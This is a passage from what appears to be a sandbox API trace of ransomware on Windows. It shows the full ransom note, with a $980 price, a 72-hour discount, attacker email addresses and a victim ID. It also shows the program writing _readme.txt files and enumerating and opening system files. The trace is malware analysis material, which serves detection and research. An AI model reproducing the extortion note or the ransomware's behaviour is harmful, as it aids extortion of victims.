will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.897] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.897] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.897] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.897] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.897] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.897] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.898] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.898] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0165.898] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.898] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.898] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.898] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.898] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.898] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.898] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.899] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.899] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.900] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.900] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.901] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.901] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.902] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c610 [0165.902] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) 